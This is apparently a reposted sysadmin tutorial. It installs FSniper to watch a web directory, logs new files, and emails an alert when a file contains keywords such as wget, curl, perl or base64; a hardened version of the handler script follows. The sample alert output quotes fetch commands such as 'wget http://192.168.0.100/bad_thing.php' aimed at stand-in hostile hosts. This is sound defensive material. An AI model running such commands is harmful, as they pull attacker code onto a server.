
20131020

FSniper - Monitor Newly Created Files in Directory

Fsniper is a small utility that waits for a file to be created or changed and then runs a command on it. Whenever a new file appears, fsniper hands the command the file's path and name, so we can act on the result: send a notification, or move the file into a specific folder based on its MIME type, for example.
Examples of what FSniper can be used for:
  1. Sort newly created files into a given directory based on MIME type
  2. Notify the system administrator by email that new files have been created
  3. Move or delete unwanted files, by extension, out of the directory being watched
  4. Scan new files with ClamAV and send the results by email
  5. Much more; you can think of your own
In this case, I was using the following setup:
Server OS: CentOS 5.6 64bit
Directory to be watched: /home/user/public_html
Files being monitored: Images and text files
Action to be taken: Append the file's path, date, time and owner to another text file
Log in to the server and proceed as follows:
1. Install the dependencies via yum:
yum install pcre* file-libs file-devel -y
         
2. Download fsniper using wget. You can find the source at http://freshmeat.net/projects/fsniper :
wget http://projects.l3ib.org/fsniper/files/fsniper-1.3.1.tar.gz
         
3. Extract the downloaded files:
tar -xzf fsniper-1.3.1.tar.gz
         
4. Enter the directory, configure and install:
cd fsniper-*
./configure
make
make install

5. Fsniper is installed. Try running it with the following command:
fsniper --verbose


6. You will see an error telling you that it can't find the configuration file, so we need to create it. Stop the FSniper process by pressing Ctrl+C.
7. Create the config file under the /root/.config/fsniper/ directory (the directory does not exist yet, so create it first):
mkdir -p /root/.config/fsniper
touch /root/.config/fsniper/config
         
8. We need to tell FSniper to watch everything listed above. Put the following lines into /root/.config/fsniper/config using a text editor:
watch {
  # we are watching the public_html directory
  /home/user/public_html {
    # set recurse to true to watch subdirectories as well
    recurse = true
    # monitor any MIME type starting with image
    image/* {
      # the handler runs the script; %% is replaced with the full path of the new file
      handler = /home/user/new_files_detector %%
    }
    # monitor any MIME type starting with text
    text/* {
      # the handler runs the script; %% is replaced with the full path of the new file
      handler = /home/user/new_files_detector %%
    }
  }
}
9. As you can see in the config file we just created, the handler executes a script called "/home/user/new_files_detector" with %% replaced by the full path of the new file. Let's create that script:
touch /home/user/new_files_detector
chmod 755 /home/user/new_files_detector
         
10. Open the script in a text editor and paste the following lines:
#!/bin/bash
output_file='/var/www/html/new_files.txt'
# owner of the new file, taken from the ls listing
user_owner=$(ls -l "$1" | awk '{print $3}')
# append date, time, full path and owner to the output file
echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" "$1" "|" "$user_owner" >> "$output_file"
11. In the script above, I want the results sent to a text file called new_files.txt, which can be viewed in a web browser (/var/www/html is my web document root). Output like the following will appear:
2011-06-27 10:47 >> /home/user/public_html/new_files2.txt | root
2011-06-27 10:49 >> /home/user/public_html/temp.txt | nobody
This is an example of my implementation for notification purposes. You can do many things with this tool, and I hope this tutorial makes it easier for you. Cheers!
Source: http://blog.secaserver.com/2011/06/fsniper-monitor-newly-created-files-in-directory/

Detect New Files and Send Notification if Suspicious

This post requires Fsniper to be installed and running on your box. Please see the following post: FSniper – Monitor Newly Created Files in Directory. This is similar to the popular paid product ConfigServer eXploit Scanner (cxs), which also uses the inotify facility available since kernel 2.6.13.
I am using Fsniper to check for and detect new files and let its handler trigger the following script. The script logs every new file FSniper captures to /var/www/html/new_files.txt (so I can browse the list in a web browser at http://yourwebsite.com/new_files.txt) and then notifies me whenever it finds any of these suspicious words inside the file:

wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64


#!/bin/bash
output_file='/var/www/html/new_files.txt'
user_owner=$(ls -l "$1" | awk '{print $3}')
ip=$(hostname -i)
subject='Found something suspicious'
emailto='youremail@domain.tld'
message=/tmp/emailmessage.txt
# words that trigger a notification (matched case-insensitively, as substrings)
pattern='(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)'

# log the new file: date, time, full path and owner
echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" "$1" "|" "$user_owner" >> "$output_file"

# count the lines that contain any of the suspicious words
danger=$(egrep -iH "$pattern" "$1" | wc -l)

if [ "$danger" -gt 0 ]; then
    echo 'Server:' $(hostname) > "$message"
    egrep -iH "$pattern" "$1" >> "$message"
    mail -s "$ip | $subject" "$emailto" < "$message"
fi
The email you receive will look similar to this:
From: root
To: youremail@domain.tld
Subject: 192.168.1.1 | Found something suspicious
Email Body:
Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:wget http://192.168.0.100/bad_thing.php
/home/user/public_html/test3.php:curl http://hackers.tld/scripts
This will help you monitor file changes and make sure you are the first to know when a new file contains unwanted words. You can modify the script to suit your needs.
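A hardened version of the handler used in both posts above, added here as an example; it is not the original author's script. It keeps the same contract (FSniper calls it with the new file's full path as the first argument) but quotes paths, reads the owner with GNU stat instead of parsing ls, and matches the word list as whole words so that "cd" no longer fires on "cdn" and "sh" no longer fires on "dashboard". The log path, the function names, the GNU coreutils/grep options (stat -c, grep -w) and the constructed sample input are assumptions; sending the report by mail is left to the caller.

```shell
#!/bin/bash
# Added example, not the original posts' handler. Assumes GNU coreutils/grep
# (stat -c, grep -w) and that FSniper passes the new file's full path as $1.

# Same word list as the posts; -w below makes each hit a whole word.
PATTERN='wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64'

# Append "YYYY-MM-DD HH:MM >> /path/to/file | owner" to the log file.
log_new_file() {
    local file="$1" logfile="$2" owner
    owner=$(stat -c '%U' -- "$file") || return 1
    printf '%s %s >> %s | %s\n' \
        "$(date +%Y-%m-%d)" "$(date +%H:%M)" "$file" "$owner" >> "$logfile"
}

# Print every line holding a suspicious whole word, prefixed with the
# file name (-H), case-insensitively (-i); exit status 1 if there are none.
suspicious_lines() {
    grep -EiwH -- "$PATTERN" "$1"
}

# True (exit 0) when the file has at least one suspicious line.
is_suspicious() {
    suspicious_lines "$1" > /dev/null
}

# Write the report body the posts mail out ("Server: <host>" followed by
# the matching lines) to a temp file and print that file's path.
build_report() {
    local file="$1" report
    report=$(mktemp) || return 1
    {
        echo "Server: $(hostname 2>/dev/null || uname -n)"
        suspicious_lines "$file"
    } > "$report"
    echo "$report"
}

# Handler entry point: log every file, report only when it looks suspicious.
# To mail it as the posts do, replace the echo with something like:
#   mail -s "$(hostname) | Found something suspicious" you@example.org < "$report"
main() {
    local file="$1" logfile="${2:-/var/www/html/new_files.txt}" report
    log_new_file "$file" "$logfile" || exit 1
    if is_suspicious "$file"; then
        report=$(build_report "$file")
        echo "suspicious content in $file, report written to $report"
    fi
}

# Run only when invoked with a file argument, so the functions can also be sourced.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Configure it exactly like the original handler (handler = /path/to/this/script %%); an optional second argument overrides the log path. Two design notes: whole-word matching cuts the false positives of the posts' substring pattern, but "sh" or "cd" as standalone words are still common in ordinary text, so treat the mail as a prompt to look, not as a verdict; and a log that lists every uploaded file's path and owner is sensitive, so if it is kept under the web document root as in the posts, restrict who can fetch it.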


Source: http://blog.secaserver.com/2011/06/detect-new-files-and-send-notification-if-suspicious/
